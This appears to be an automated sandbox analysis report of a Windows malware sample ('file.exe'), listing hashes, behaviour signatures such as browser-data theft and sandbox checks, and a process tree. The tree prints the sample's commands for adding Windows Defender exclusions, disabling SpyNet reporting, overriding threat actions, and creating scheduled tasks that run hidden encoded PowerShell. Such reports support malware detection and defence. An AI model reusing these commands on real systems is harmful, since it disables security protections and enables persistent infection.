Analysis

  • max time kernel
    89s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-01-2023 02:38

General

  • Target

    file.exe

  • Size

    7.2MB

  • MD5

    6078f3509ba418806f0a815ae432f4a6

  • SHA1

    6f13d0c906168f57ff4538e552a62e638213ac19

  • SHA256

    ae014760994b198659cbb57a0300b70b52297cee17473e6dc1886b97b352a031

  • SHA512

    a694f14748900f7b7098416b423bf710314398e43d0a4006f038af90b45535f74b0d153a4f3e9dba4d20c8d2962b7f79ea01eed70d28203d529a204995e4dd9d

  • SSDEEP

    196608:91Oce9T0dmeHFR2hxRvBNWsOcYwivfuiAo:3OTAd5CNWksnuI

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2484
    • C:\Users\Admin\AppData\Local\Temp\7zS8D22.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4040
      • C:\Users\Admin\AppData\Local\Temp\7zS8FD1.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks computer location settings
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1440
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3336
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:392
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:3496
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:4088
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2052
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4848
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:1992
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:5036
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gYsdGjMRE" /SC once /ST 00:17:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:3096
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gYsdGjMRE"
                  4⤵
                    PID:1284
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gYsdGjMRE"
                    4⤵
                      PID:4816
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bCyvnyfpqmszJThflt" /SC once /ST 03:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qeWngPqsDKCKdDfMS\dmkJKBLNxjoaHKN\raSOoHc.exe\" Iz /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:1716
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1116
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:3776
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                  1⤵
                    PID:2172
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                    1⤵
                      PID:4228
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:3264
                      • C:\Users\Admin\AppData\Local\Temp\qeWngPqsDKCKdDfMS\dmkJKBLNxjoaHKN\raSOoHc.exe
                        C:\Users\Admin\AppData\Local\Temp\qeWngPqsDKCKdDfMS\dmkJKBLNxjoaHKN\raSOoHc.exe Iz /site_id 525403 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of WriteProcessMemory
                        PID:1844
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4664
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2112
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                                PID:3964
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:3864
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:4912
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:2120
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:708
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:2316
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:1460
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:2520
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:628
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:1308
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:220
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:1700
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                      PID:4756
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:2160
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:392
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:2408
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:4280
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:3336
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:4848
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:348
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:2708
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:2736
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:3716
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:3088
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XQsbGbUnGtzU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XQsbGbUnGtzU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZQBnsRMytUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZQBnsRMytUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dcfUmdSjU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dcfUmdSjU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ePXawUxxZnGOC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ePXawUxxZnGOC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wsiZiWSgtetGEIvxlHR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wsiZiWSgtetGEIvxlHR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\rJEhQdXgeMRvrNVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\rJEhQdXgeMRvrNVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qeWngPqsDKCKdDfMS\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qeWngPqsDKCKdDfMS\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nfNWSymqMUpUuHcO\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nfNWSymqMUpUuHcO\" /t REG_DWORD /d 0 /reg:64;"
                                                                          2⤵
                                                                          • Drops file in System32 directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2424
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XQsbGbUnGtzU2" /t REG_DWORD /d 0 /reg:32
                                                                            3⤵
                                                                              PID:1764
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XQsbGbUnGtzU2" /t REG_DWORD /d 0 /reg:32
                                                                                4⤵
                                                                                  PID:2304
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XQsbGbUnGtzU2" /t REG_DWORD /d 0 /reg:64
                                                                                3⤵
                                                                                  PID:1832
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZQBnsRMytUUn" /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                    PID:3412
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZQBnsRMytUUn" /t REG_DWORD /d 0 /reg:64
                                                                                    3⤵
                                                                                      PID:3400
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dcfUmdSjU" /t REG_DWORD /d 0 /reg:32
                                                                                      3⤵
                                                                                        PID:2264
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dcfUmdSjU" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                          PID:4468
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ePXawUxxZnGOC" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:4408
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ePXawUxxZnGOC" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:5088
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wsiZiWSgtetGEIvxlHR" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:4616
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wsiZiWSgtetGEIvxlHR" /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:4880
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\rJEhQdXgeMRvrNVB /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:1476
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\rJEhQdXgeMRvrNVB /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:2092
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qeWngPqsDKCKdDfMS /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:4844
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qeWngPqsDKCKdDfMS /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:2564
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nfNWSymqMUpUuHcO /t REG_DWORD /d 0 /reg:32
                                                                                                          3⤵
                                                                                                            PID:620
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nfNWSymqMUpUuHcO /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:1432
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /CREATE /TN "gvpbSUCAb" /SC once /ST 00:27:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                            2⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:4824
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /run /I /tn "gvpbSUCAb"
                                                                                                            2⤵
                                                                                                              PID:852
